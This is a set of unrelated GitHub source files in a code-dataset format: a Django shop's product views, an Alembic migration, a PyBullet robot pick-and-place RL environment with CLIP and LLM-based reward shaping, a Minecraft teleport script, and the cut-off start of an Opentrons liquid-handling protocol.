models.Products = query.order_by('-price').first()\r\n db_max_price = product.price if product is not None else 0\r\n context['db_max_price'] = db_max_price\r\n context['start_price'] = self.request.GET.get('start_price') or 0\r\n context['end_price'] = self.request.GET.get('end_price') or db_max_price\r\n context['banners'] = SiteBanner.objects.filter(is_active=True,\r\n position__iexact=SiteBanner.SiteBannerPositions.product_list)\r\n return context\r\n\r\n def get_queryset(self):\r\n query = super(ProductListView, self).get_queryset()\r\n category_name = self.kwargs.get('cat')\r\n brand_name = self.kwargs.get('brand')\r\n request: HttpRequest = self.request\r\n start_price = request.GET.get('start_price')\r\n end_price = request.GET.get('end_price')\r\n if start_price is not None:\r\n query = query.filter(price__gte=start_price)\r\n\r\n if end_price is not None:\r\n query = query.filter(price__lte=end_price)\r\n\r\n if brand_name is not None:\r\n query = query.filter(brand__url_title__iexact=brand_name)\r\n\r\n if category_name is not None:\r\n query = query.filter(category__url_title__iexact=category_name)\r\n return query\r\n\r\n\r\nclass ProductDetailView(DetailView):\r\n model = models.Products\r\n template_name = 'product_module/product_detail.html'\r\n context_object_name = 'product'\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super().get_context_data(**kwargs)\r\n loaded_product = self.object\r\n request = self.request\r\n # favorite_product_id = request.session.get(\"product_favorites\")\r\n # context['is_favorite'] = favorite_product_id == str(loaded_product.id)\r\n context['banners'] = SiteBanner.objects.filter(is_active=True,\r\n position__iexact=SiteBanner.SiteBannerPositions.product_detail)\r\n galleries = list(models.ProductGallery.objects.filter(product_id=loaded_product.id).all())\r\n galleries.insert(0, loaded_product)\r\n context['product_galleries_group'] = convertors.group_list(galleries, 3)\r\n context['related_products'] = convertors.group_list(list(\r\n models.Products.objects.filter(brand_id=loaded_product.brand_id).exclude(pk=loaded_product.id).all()[:12]),\r\n 3)\r\n\r\n # -----------------\r\n context['comments'] = models.ProductComment.objects.filter(product_id=loaded_product.id, parent=None,\r\n is_read_by_admin=True).order_by(\r\n '-create_date').prefetch_related('productcomment_set')\r\n context['comments_count'] = models.ProductComment.objects.filter(product_id=loaded_product.id,\r\n is_read_by_admin=True).count()\r\n # ----------------------\r\n user_ip = http_service.get_client_ip(self.request)\r\n user_id = None\r\n if self.request.user.is_authenticated:\r\n user_id = self.request.user.id\r\n\r\n has_been_visited = models.ProductVisit.objects.filter(ip__iexact=user_ip, product_id=loaded_product.id).exists()\r\n\r\n if not has_been_visited:\r\n new_visit = models.ProductVisit(ip=user_ip, user_id=user_id, product_id=loaded_product.id)\r\n new_visit.save()\r\n\r\n return context\r\n\r\n\r\ndef product_categories_partial(request: HttpRequest):\r\n print('fuck you')\r\n product_categories = models.ProductCategory.objects.filter(is_active=True, is_delete=False)\r\n context = {\r\n 'categories': product_categories\r\n }\r\n return render(request, 'product_module/partial_view/product_category_partial.html', context)\r\n\r\n\r\ndef product_brands_partial(request: HttpRequest):\r\n product_brands = models.ProductBrand.objects.annotate(products_count=Count('products')).filter(is_active=True)\r\n context = {\r\n 'brands': product_brands\r\n }\r\n return render(request, 'product_module/partial_view/product_brands_partial.html', context)\r\n\r\n\r\ndef add_product_comment(request: HttpRequest):\r\n if request.user.is_authenticated:\r\n product_id = request.GET.get('product_id')\r\n product_comment = request.GET.get('product_comment')\r\n parent_id = request.GET.get('parent_id')\r\n # print(article_id, article_comment, parent_id)\r\n new_comment = models.ProductComment(product_id=product_id, message=product_comment, user_id=request.user.id,\r\n parent_id=parent_id)\r\n new_comment.save()\r\n context = {\r\n 'comments': models.ProductComment.objects.filter(product_id=product_id, parent=None,\r\n is_read_by_admin=True).order_by(\r\n '-create_date').prefetch_related('productcomment_set'),\r\n 'comments_count': models.ProductComment.objects.filter(product_id=product_id, is_read_by_admin=True).count()\r\n }\r\n\r\n return render(request, 'includes/product_comment_partial.html', context)\r\n\r\n return HttpResponse('response')\r\n\r\n\r\ndef searcher(request):\r\n search = request.GET.get('search')\r\n # models.Products.\r\n products: models.Products = models.Products.objects.filter(\r\n Q(title__icontains=search) | Q(slug__icontains=search) | Q(short_description__icontains=search) | Q(\r\n keyword__icontains=search))\r\n context = {\r\n 'products': products\r\n }\r\n\r\n return render(request, 'product_module/search_page.html', context=context)\r\n","repo_name":"omidtri/django_site","sub_path":"product_module/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39288166211","text":"\"\"\"new columns for galaxy\n\nRevision ID: fd96049a5c3b\nRevises: 2b31c874c521\nCreate Date: 2019-04-05 15:53:55.492769\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fd96049a5c3b'\ndown_revision = '2b31c874c521'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('galaxy', sa.Column('bands', sa.String(length=64), nullable=True))\n op.add_column('galaxy', sa.Column('fov', sa.REAL(), nullable=True))\n op.create_index(op.f('ix_galaxy_bands'), 'galaxy', ['bands'], unique=False)\n op.create_index(op.f('ix_galaxy_fov'), 'galaxy', ['fov'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_galaxy_fov'), table_name='galaxy')\n op.drop_index(op.f('ix_galaxy_bands'), table_name='galaxy')\n op.drop_column('galaxy', 'fov')\n op.drop_column('galaxy', 'bands')\n # ### end Alembic commands ###\n","repo_name":"felixrichards/Project-Web-App","sub_path":"migrations/versions/fd96049a5c3b_new_columns_for_galaxy.py","file_name":"fd96049a5c3b_new_columns_for_galaxy.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"71421849048","text":"from environments.environment import PickPlaceEnv,BOUNDS,PIXEL_SIZE\nfrom tasks.task import PutBlockInBowl,PickBlock\nfrom environments.timer import limit_decor\nimport numpy as np\nimport pybullet\nimport cv2\nfrom reward.prompt import get_prompt,ask_LLM,interme_reward\nfrom reward.prompt_withoutVild import get_description,motion_descriptor,translator\nfrom reward.detector import VILD\nfrom environments.utils import *\n# from gym import spaces\nfrom gymnasium import spaces\nimport torch as th\nimport clip\nimport time\nfrom PIL import Image\nimport time\n\nclass TestEnv(PickPlaceEnv):\n def __init__(self, task):\n super().__init__(task)\n self.vlm = VILD()\n def get_reward(self,obs,action):\n time_penalty = -0.05\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n moved = False\n for key in self.obj_name_to_id.keys():\n if np.linalg.norm(np.array(pos[key]) - np.array(self.obj_pos[key])) > 0.01:\n moved = True\n if not moved:\n return time_penalty,False\n else:\n img = cv2.cvtColor(obs[\"image\"],cv2.COLOR_RGB2BGR)\n cv2.imwrite('reward/tmp/color.png',img)\n found_objects_ap,_ = self.vlm.vild_detect('reward/tmp/color.png',self.task.category_names,verbose=True)\n text = get_prompt(obs[\"lang_goal\"],self.found_objects,found_objects_ap)\n print(\"text:\",text)\n ans = ask_LLM(text)\n print(\"ans:\",ans)\n if ans:\n reward = 1\n return 1,True\n else:\n reward = -time_penalty\n print(\"found objects:\",self.found_objects)\n dense_reward = interme_reward(motion_descriptor(obs[\"lang_goal\"],self.found_objects),action)\n reward += dense_reward\n return reward,False\n\n # TODO: check did the robot follow text instructions?\n def reset_reward(self,obs):\n img = cv2.cvtColor(obs[\"image\"],cv2.COLOR_RGB2BGR)\n cv2.imwrite('reward/tmp/color.png',img)\n self.found_objects,_ = self.vlm.vild_detect('reward/tmp/color.png',self.task.category_names,verbose=True)\n print(\"fond objects in reset\",self.found_objects)\n\nclass PickOrPlaceEnvWithoutLangReward(PickPlaceEnv):\n # choose pick/place instead of pick_and_place\n\n def __init__(self, task,render=False):\n super().__init__(task,render=render)\n image_size = (224,224)\n self.image_size = image_size\n self.height_coef = 20\n #TBD: change the observation space\n self.observation_space = spaces.Dict({\n \"image\": spaces.Box(0, 1, image_size + (4,), dtype=np.float32),\n \"lang_goal\": spaces.Box(-5, 5, (512,), dtype=np.float32),\n \"clip_image\": spaces.Box(-5, 5, (512,), dtype=np.float32),\n \"object_in_hand\": spaces.Box(0, 1, (1,), dtype=np.bool8),\n \"lang_recommendation\": spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, 1, 1]),dtype=np.float32),\n })\n # self.observation_space = spaces.Dict({\"image\":spaces.Box(0, 1, image_size + (4,), dtype=np.float32)})\n # self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, 1, 1]),dtype=np.float32)\n self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, image_size[0], image_size[1]]),dtype=np.int16)\n self.max_steps = 10\n self.clip_model, self.clip_preprocess = clip.load(\"ViT-B/32\", device=\"cpu\")\n\n def reset(self,seed = None):\n self.last_pick_success = 0\n self.info = {\n \"step_result\":['initialization'],\n \"LLM_recommendation\":[],\n \"obj_position\":[],\n }\n return super().reset()\n\n\n\n def step(self, action=None):\n start_time = time.time()\n print(\"lang goal\",self.lang_goal)\n \"\"\"Do pick and place motion primitive.\"\"\"\n height = self.last_observation[\"depth\"]\n pick_success = 0\n # Move to object.\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n max_time = 3\n if len(action.shape) == 2:\n action = action.squeeze(0)\n pix = action[1:].copy()\n # print(np.array(self.action_space.high[1:]))\n # position of objects\n pos = {}\n TRUE_ACT = False\n for key in self.obj_name_to_id.keys():\n _pos = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n if key in self.task.config[\"pick\"]:\n max_dis = 15\n if key in self.task.config[\"place\"]:\n max_dis = 25\n _pos_pix = xyz_to_pix(_pos,BOUNDS,PIXEL_SIZE)\n # print(np.linalg.norm(_pos_pix-pix),_pos_pix,pix)\n if np.linalg.norm(_pos_pix-pix) < max_dis:\n \n TRUE_ACT = True\n break\n if self.observation[\"object_in_hand\"][0] == 1:\n TRUE_ACT = True\n if not TRUE_ACT:\n print(\"@@@@@@@@@@@@action out of meaningless\")\n\n\n # print(\"pos:\",pos)\n if action[0] < 0.5 and TRUE_ACT:\n #pick\n self.gripper.release()\n pick_pix = pix\n\n pick_pix = pick_pix.astype(np.int32)\n pick_pix = np.clip(pick_pix,[0,0],[self.image_size[0]-1,self.image_size[1]-1])\n # print(pick_pix,height, BOUNDS,PIXEL_SIZE)\n pick_xyz = pix_to_xyz(pick_pix,height, BOUNDS,PIXEL_SIZE,pick=True)\n hover_xyz = pick_xyz.copy() + np.float32([0, 0, 0.2])\n print(\"steping pick: \", pick_xyz)\n\n moving_time = 0\n while np.linalg.norm(hover_xyz - ee_xyz) > 0.01:\n moving_time+= self.dt\n self.movep(hover_xyz,5)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n\n moving_time = 0\n while np.linalg.norm(pick_xyz - ee_xyz) > 0.01:\n moving_time+= self.dt\n self.movep(pick_xyz)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n\n # Pick up object.\n self.gripper.activate()\n for _ in range(240):\n self.step_sim_and_render()\n moving_time = 0\n while np.linalg.norm(hover_xyz - ee_xyz) > 0.01:\n moving_time+= self.dt\n self.movep(hover_xyz,2)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n hover_xyz = np.float32([0, -0.2, 0.4])\n moving_time = 0\n while np.linalg.norm(hover_xyz - ee_xyz) > 0.01:\n self.movep(hover_xyz,2)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n pick_success = int(self.gripper.check_grasp())\n \n print(\"pick_success\",pick_success)\n\n\n elif action[0] > 0.5 and TRUE_ACT:\n #place\n place_pix = pix\n place_pix = place_pix.astype(np.int32)\n place_pix = np.clip(place_pix,[0,0],[self.image_size[0]-1,self.image_size[1]-1])\n place_xyz = pix_to_xyz(place_pix,height, BOUNDS,PIXEL_SIZE,pick=False)\n print(\"steping: place\", place_xyz)\n\n # Move to place location.\n moving_time = 0\n while np.linalg.norm(place_xyz - ee_xyz) > 0.01:\n moving_time+= self.dt\n self.movep(place_xyz)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time>max_time:\n print(\"moving time out\")\n break\n\n # Place down object.\n moving_time = 0\n print(\"place_xyz[2]\",place_xyz[2],self.gripper.detect_contact())\n while (self.gripper.detect_contact()) and (place_xyz[2] > 0.03):\n \n moving_time+= self.dt\n place_xyz[2] -= 0.001\n self.movep(place_xyz)\n for _ in range(3):\n self.step_sim_and_render()\n if moving_time>max_time:\n print(\"moving time out\")\n break\n self.gripper.release()\n for _ in range(240):\n self.step_sim_and_render()\n place_xyz[2] = 0.2\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n moving_time = 0\n while np.linalg.norm(place_xyz - ee_xyz) > 0.01:\n self.movep(place_xyz,5)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n\n place_xyz = np.float32([0, -0.2, 0.4])\n moving_time = 0\n while np.linalg.norm(place_xyz - ee_xyz) > 0.01:\n self.movep(place_xyz,5)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n # position of objects\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n \n\n res = get_description(self,action,pick_success,pos,last_pos=self.obj_pos)\n \n print(\"res:\",res)\n self.info[\"step_result\"].append(res)\n obs_start_time = time.time()\n observation = self.get_observation(pick_success)\n \n reward,done = self.get_reward(observation,action,pos=pos,last_pos=self.obj_pos)\n # record as last position\n self.obj_pos = pos\n self.last_pick_success = pick_success\n self.step_count += 1\n print(\"action \",action,\"reward\",reward)\n print(\"###############time:\",time.time()-start_time,\"obs time:\",time.time()-obs_start_time)\n print(\"observation:\",observation)\n info = self.get_info()\n return observation, reward, done,False, info\n def get_info(self):\n return self.info\n \n def get_observation(self,pick_success=0):\n\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n self.info[\"obj_position\"].append(pos)\n obs = super().get_observation()\n #\"image\" \"depth\" \"xyzmap\" \"lang_goal\"\n self.last_observation = obs\n observation = {} # image(RGBD) lang_goal(encoded) object_in_hand(bool)\n # print(\"obs\",obs[\"image\"].shape,obs[\"image\"].dtype,obs[\"image\"].max(),obs[\"image\"].min())\n img = obs[\"image\"]/255\n img = np.concatenate([img,self.height_coef*obs[\"depth\"][..., None]],axis=-1)\n # print(\"img shape\",img.shape)\n # print(\"depth shape\",obs[\"depth\"][..., None].shape)\n observation[\"image\"] = img\n observation['object_in_hand'] = np.array([pick_success])\n lang_goal = clip.tokenize(obs['lang_goal'])\n with th.no_grad():\n embedding = self.clip_model.encode_text(lang_goal)\n clip_image = Image.fromarray(obs[\"image\"])\n clip_image = self.clip_preprocess(clip_image).unsqueeze(0).to(\"cpu\")\n clip_image = self.clip_model.encode_image(clip_image)\n # print(\"clip_image\",clip_image.shape,clip_image.dtype,clip_image.max(),clip_image.min())\n observation['lang_goal'] = embedding.numpy()\n observation['clip_image'] = clip_image.numpy()\n # clip_image.show()\n # print(\"lang_goal\",observation['lang_goal'].dtype)\n \n llm_expert = True\n # for saving money and time: when nothing done, do not prompt LLM\n if len(self.info[\"step_result\"])>1:\n changed = False\n for result in self.info[\"step_result\"][1:]:\n if result != \"pick up nothing\" and result != \"place nothing\":\n changed = True\n break\n if not changed:\n llm_expert = False\n else:\n llm_expert = False\n #forced to not prompt llm\n llm_expert = False\n \n # prompting LLM\n if llm_expert:\n try:\n motion_description=motion_descriptor(self.lang_goal,self.info)\n LLM_action = translator(motion_description,self.info)\n LLM_action[1:] = np.array(LLM_action[1:])/np.array(self.image_size)\n except:\n LLM_action = np.zeros((3,))\n else:\n pick_idx = self.task.goals[0]\n pick_pos = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[self.task.config[\"pick\"][pick_idx]])[0]\n pix = xyz_to_pix(pick_pos,BOUNDS,PIXEL_SIZE)\n LLM_action = np.array([0,pix[0]/self.image_size[0],pix[1]/self.image_size[1]])\n # print(\"LLM_action\",LLM_action)\n observation['lang_recommendation'] = np.array(LLM_action)\n self.info[\"LLM_recommendation\"].append(LLM_action)\n self.observation = observation \n # print(\"image\",img.shape,observation[\"image\"].dtype,img.max(),img.min())\n # print(self.info[\"step_result\"],llm_expert)\n\n # print(\"lang_goal:\",observation['lang_goal'].shape,observation['lang_goal'].dtype,observation['lang_goal'].max(),observation['lang_goal'].min())\n return observation\n def super_get_observation(self):\n return super().get_observation()\n def get_reward(self,observation,action,pos,last_pos):\n # todo cross entropy loss\n phase_penalty = 0.2\n damage_penalty = 0.25\n done = False\n if self.step_count >= self.max_steps:\n done = True\n time_penalty = -0.05\n\n moved = False\n for key in self.obj_name_to_id.keys():\n if np.linalg.norm(np.array(pos[key]) - np.array(last_pos[key])) > 0.01:\n moved = True\n if out_of_bound(pos[key],BOUNDS):\n done = True\n return -damage_penalty,done\n \n # loss for not following the recommendation\n LLM_loss = 0\n # LLM_action = self.info[\"LLM_recommendation\"][-2]\n # action_primitive = action[0]\n # if action_primitive < 0.5:\n # action_primitive = 0\n # else:\n # action_primitive = 1\n # if LLM_action[0] != action_primitive:\n # LLM_loss += -phase_penalty\n # else:\n # dis = np.linalg.norm(np.array(self.image_size)*action[1:]-np.array(self.image_size)*np.array(LLM_action[1:]))\n # print(\"dis:\",dis)\n # LLM_loss = 0.05*5/(dis+5)\n # if (LLM_action == np.zeros((3,))).all():\n # LLM_loss = 0\n if not moved:\n return time_penalty+LLM_loss,done\n reward,_done = self.task.get_reward(self)\n done |= _done\n \n if done:\n print(\"reward:\",reward,\"done:\",done)\n return reward,done\n else:\n reward = time_penalty+LLM_loss\n # for phase: if it already pick up the object, punish it if it not put down the object\n if self.last_pick_success == 1:\n if action[0] < 0.5:\n reward += -phase_penalty\n if action[0] > 0.5:\n if self.last_pick_success == 0:\n reward += -phase_penalty\n print(\"reward:\",reward,\"done\",done)\n return time_penalty,done\n\n\n def reset_reward(self, obs):\n return 0,False\n\n @limit_decor(10, 1.)\n def prompt_llm_func(self):\n motion_description=motion_descriptor(self.lang_goal,self.info)\n LLM_action = translator(motion_description,self.info)\n LLM_action[1:] = np.array(LLM_action[1:])/np.array(self.image_size)*self.action_space.high[1:]\n return LLM_action\n \n def prompt_llm(self):\n try:\n # print(\"########################prompting LLM\")\n LLM_action = self.prompt_llm_func()\n if LLM_action is None:\n LLM_action = np.zeros((3,))\n except:\n LLM_action = np.zeros((3,))\n return LLM_action\n \ndef out_of_bound(pos,BOUNDS):\n _pos = pos\n # print(BOUNDS,pos)\n if (np.array(_pos)[:2] < BOUNDS[:2,0]).any() or (np.array(_pos)[:2] > BOUNDS[:2,1]).any():\n if (np.array(_pos)[2:] < BOUNDS[2:,1]).any():\n print(\"out of bound\")\n return True\n else:\n return False\nclass SimplifyPickOrPlaceEnvWithoutLangReward(PickOrPlaceEnvWithoutLangReward):\n def __init__(self,render=False):\n task = PutBlockInBowl\n super().__init__(task,render)\n image_size = (224,224)\n self.image_size = image_size\n self.height_coef = 20\n #TBD: change the observation space\n obj_num = len(self.task.category_names)\n goal_num = 2\n self.observation_space = spaces.Dict({\n \"image\": spaces.Box(0, image_size[0], (obj_num*2,), dtype=np.int32),\n \"lang_goal\": spaces.Box(0, obj_num, (goal_num,), dtype=np.int32),\n \"object_in_hand\": spaces.Box(0, 1, (1,), dtype=np.bool8),\n })\n # self.observation_space = spaces.Dict({\"image\":spaces.Box(0, 1, image_size + (4,), dtype=np.float32)})\n # self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, 1, 1]),dtype=np.float32)\n self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, image_size[0], image_size[1]]),dtype=np.float32)\n self.max_steps = 10\n # self.epsilon = 0.5\n self.clip_model, self.clip_preprocess = clip.load(\"ViT-B/32\", device=\"cpu\")\n\n def get_observation(self,pick_success=0):\n\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n self.info[\"obj_position\"].append(pos)\n pos_list = []\n for key in self.task.config['pick']:\n pos_list += xyz_to_pix(pos[key],BOUNDS,PIXEL_SIZE)\n for key in self.task.config['place']:\n pos_list += xyz_to_pix(pos[key],BOUNDS,PIXEL_SIZE)\n \n # print(\"task config\",self.task.config)\n obs = super().super_get_observation()\n #\"image\" \"depth\" \"xyzmap\" \"lang_goal\"\n self.last_observation = obs\n observation = {} # image(RGBD) lang_goal(encoded) object_in_hand(bool)\n observation['image'] = pos_list #pesudo image with position sequence\n observation['object_in_hand'] = np.array([pick_success])\n lang_goal = self.task.goals\n observation['lang_goal'] = lang_goal\n self.observation = observation\n return observation\n\n # clip_image.show()\n # print(\"lang_goal\",observation['lang_goal'].dtype)\n def get_reward(self,observation,action,pos,last_pos):\n phase_penalty = 0.25\n damage_penalty = 0.25\n done = False\n time_penalty = -0.05\n reward = 0\n desired_primitive = self.last_pick_success\n if self.last_pick_success:\n desired_position = last_pos[self.task.config['place'][self.task.goals[1]]]\n desired_position = xyz_to_pix(desired_position,BOUNDS,PIXEL_SIZE)\n desired_action = [desired_primitive]+desired_position[:2]\n else:\n desired_position = last_pos[self.task.config['pick'][self.task.goals[0]]]\n desired_position = xyz_to_pix(desired_position,BOUNDS,PIXEL_SIZE)\n desired_action = [desired_primitive]+desired_position[:2]\n y = self.last_pick_success\n print(\"desired_action\",desired_action)\n cross_ent = y*np.log(action[0]+0.001)+(1-y)*np.log(1-action[0]+0.001)\n phase_loss = -cross_ent*phase_penalty\n phase_loss = np.clip(phase_loss,0, phase_penalty)\n reward -= phase_loss\n print(\"phase_loss\",phase_loss)\n dis_loss = 0\n if (action[0] > 0.5)== self.last_pick_success:\n dis = np.linalg.norm(action[1:]-desired_action[1:])\n dis_loss = 0.25*3/(0.5*dis+3)\n reward += dis_loss\n print(\"dis_reward\",dis_loss) \n done = (self.step_count >= self.max_steps)\n _reward,_done = self.task.get_reward(self)\n reward += _reward\n done |= _done\n return reward,done\n def get_expert_demonstration(self):\n print(\"get_expert_demonstration\")\n print(self.observation)\n object_in_hand = self.observation['object_in_hand'][0]\n obj_pos = self.observation['image']\n goals = self.observation['lang_goal']\n if object_in_hand:\n desired_position = obj_pos[6+2*goals[1]:8+2*goals[1]]\n desired_action = [1]+desired_position[:2]\n else:\n desired_position = obj_pos[2*goals[0]:2*goals[0]+2]\n desired_action = [0]+desired_position[:2]\n print(\"desired_action\",desired_action)\n return desired_action\n \nclass SimplifyPickEnvWithoutLangReward(PickOrPlaceEnvWithoutLangReward):\n def __init__(self,render=False,multi_discrete=False,scale_obs=False):\n task = PickBlock\n super().__init__(task,render)\n \n obj_num = len(self.task.category_names)\n goal_num = 1\n self.scale_obs = scale_obs\n if not scale_obs:\n self.observation_space = spaces.Dict({\n \"image\": spaces.Box(0, self.image_size[0], (obj_num*2,), dtype=np.int32),\n \"lang_goal\": spaces.Box(0, obj_num, (goal_num,), dtype=np.int32),\n \"object_in_hand\": spaces.Box(0, 1, (1,), dtype=np.bool8),\n })\n else:\n self.observation_space = spaces.Dict({\n \"image\": spaces.Box(0, 1, (obj_num*2,), dtype=np.float32),\n \"lang_goal\": spaces.Box(0, obj_num, (goal_num,), dtype=np.int32),\n \"object_in_hand\": spaces.Box(0, 1, (1,), dtype=np.bool8),\n })\n # self.observation_space = spaces.Dict({\"image\":spaces.Box(0, 1, image_size + (4,), dtype=np.float32)})\n # self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, 1, 1]),dtype=np.float32)\n if not multi_discrete:\n self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, self.image_size[0], self.image_size[1]]),dtype=np.float32)\n else:\n self.action_space = spaces.MultiDiscrete([1, self.image_size[0], self.image_size[1]])\n self.max_steps = 10\n\n\n def get_observation(self,pick_success=0):\n\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n self.info[\"obj_position\"].append(pos)\n pos_list = []\n for key in self.task.config['pick']:\n pos_list += xyz_to_pix(pos[key],BOUNDS,PIXEL_SIZE)\n # for key in self.task.config['place']:\n # pos_list += xyz_to_pix(pos[key],BOUNDS,PIXEL_SIZE)\n \n # print(\"task config\",self.task.config)\n obs = super().super_get_observation()\n #\"image\" \"depth\" \"xyzmap\" \"lang_goal\"\n self.last_observation = obs\n observation = {} # image(RGBD) lang_goal(encoded) object_in_hand(bool)\n if not self.scale_obs:\n observation['image'] = pos_list\n else:\n observation['image'] = np.array(pos_list)/self.image_size[0]\n #pesudo image with position sequence\n observation['object_in_hand'] = np.array([pick_success])\n lang_goal = self.task.goals\n observation['lang_goal'] = lang_goal\n self.observation = observation\n return observation\n\n # clip_image.show()\n # print(\"lang_goal\",observation['lang_goal'].dtype)\n def get_reward(self,observation,action,pos,last_pos):\n phase_penalty = 0.25\n damage_penalty = 0.25\n done = False\n time_penalty = -0.1\n reward = 0\n desired_primitive = self.last_pick_success\n if self.last_pick_success:\n desired_position = [0,0]\n desired_position = xyz_to_pix(desired_position,BOUNDS,PIXEL_SIZE)\n desired_action = [desired_primitive]+desired_position[:2]\n else:\n desired_position = last_pos[self.task.config['pick'][self.task.goals[0]]]\n desired_position = xyz_to_pix(desired_position,BOUNDS,PIXEL_SIZE)\n desired_action = [desired_primitive]+desired_position[:2]\n y = self.last_pick_success\n print(\"desired_action\",desired_action)\n cross_ent = y*np.log(action[0]+0.001)+(1-y)*np.log(1-action[0]+0.001)\n phase_loss = -cross_ent*phase_penalty\n phase_loss = np.clip(phase_loss,0, phase_penalty)\n reward -= phase_loss\n print(\"phase_loss\",phase_loss)\n dis_loss = 0\n if (action[0] < 0.5) and ( not self.last_pick_success):\n dis = np.linalg.norm(action[1:]-desired_action[1:])\n # dis_loss = 0.25*3/(0.5*dis+3)\n thre = 50\n dis_loss = - (dis/thre,1)[dis>thre]**2*0.25\n reward += dis_loss\n print(\"dis_reward\",dis_loss) \n done = (self.step_count >= self.max_steps)\n _reward,_done = self.task.get_reward(self)\n if _done:\n self.success = True\n else:\n self.success = False\n reward += _reward\n done |= _done\n return reward,done\n def get_expert_demonstration(self):\n print(\"get_expert_demonstration\")\n print(self.observation)\n object_in_hand = self.observation['object_in_hand'][0]\n obj_pos = self.observation['image']\n goals = self.observation['lang_goal']\n if object_in_hand:\n desired_position = obj_pos[6+2*goals[1]:8+2*goals[1]]\n desired_action = [1] + np.random.randint(0,self.image_size[0],(2,))\n else:\n desired_position = obj_pos[2*goals[0]:2*goals[0]+2]\n desired_action = [0] + desired_position[:2]\n print(\"desired_action\",desired_action)\n return desired_action\n def get_info(self):\n\n info = { \n 'success':self.success\n }\n if 'TimeLimit.truncated' in self.info.keys():\n info['TimeLimit.truncated'] = self.info['TimeLimit.truncated']\n # self.info = {}\n return info","repo_name":"runyuma/RA","sub_path":"environments/rl_environment.py","file_name":"rl_environment.py","file_ext":"py","file_size_in_byte":27160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34327370348","text":"'''\nPurpose: Teleports a player to different locations.\n Demonstrates usage of setTilePos and time.sleep\nFile Name: tour.py\nAuthor: Khamani Williams\nDated: 6/12/2017\n'''\nimport time \nfrom mcpi.minecraft import Minecraft\n\n# Connect to Minecraft\nmc = Minecraft.create()\n#set co-ordinates x,y,z\noriginal_x = 10\noriginal_y = 0\noriginal_z = -12\n# Change the player's position (teleport)\nmc.player.setTilePos(original_x, original_y, original_z)\ntime.sleep(3)\n\n#teleport 125 times, every 200 milliseconds\nfor i in range (1,125):\n x = 5*i\n y = 110\n z = -12\n mc.player.setTilePos(x, y, z)\n time.sleep(0.2)\n#end of for loop\n\n#set player position back to original position\nx = original_x\ny = original_y\nz = original_z\nmc.player.setTilePos(x, y, z)\ntime.sleep(3)\n\n#end of the program\n","repo_name":"creamreaper/minecraft-learning","sub_path":"chapter3.py","file_name":"chapter3.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40699975048","text":"from opentrons import protocol_api\n\n# metadata\nmetadata = {\n 'protocolName': 'My Protocol',\n 'author': 'Name ',\n 'description': 'Simple protocol to get started using OT2',\n 'apiLevel': '2.8'\n}\n\n# protocol run function. the part after the colon lets your editor know\n# where to look for autocomplete suggestions\ndef run(protocol: protocol_api.ProtocolContext):\n\n # labware\n plate = protocol.load_labware('corning_96_wellplate_360ul_flat', '3')\n tiprack = protocol.load_labware('opentrons_96_filtertiprack_200ul', '1')\n reservoir = protocol.load_labware('nest_12_reservoir_15ml', '2')\n \n # pipettes\n p300_multi = protocol.load_instrument('p300_multi_gen2', 'left', tip_racks=[tiprack])\n\n\n # commands\n # 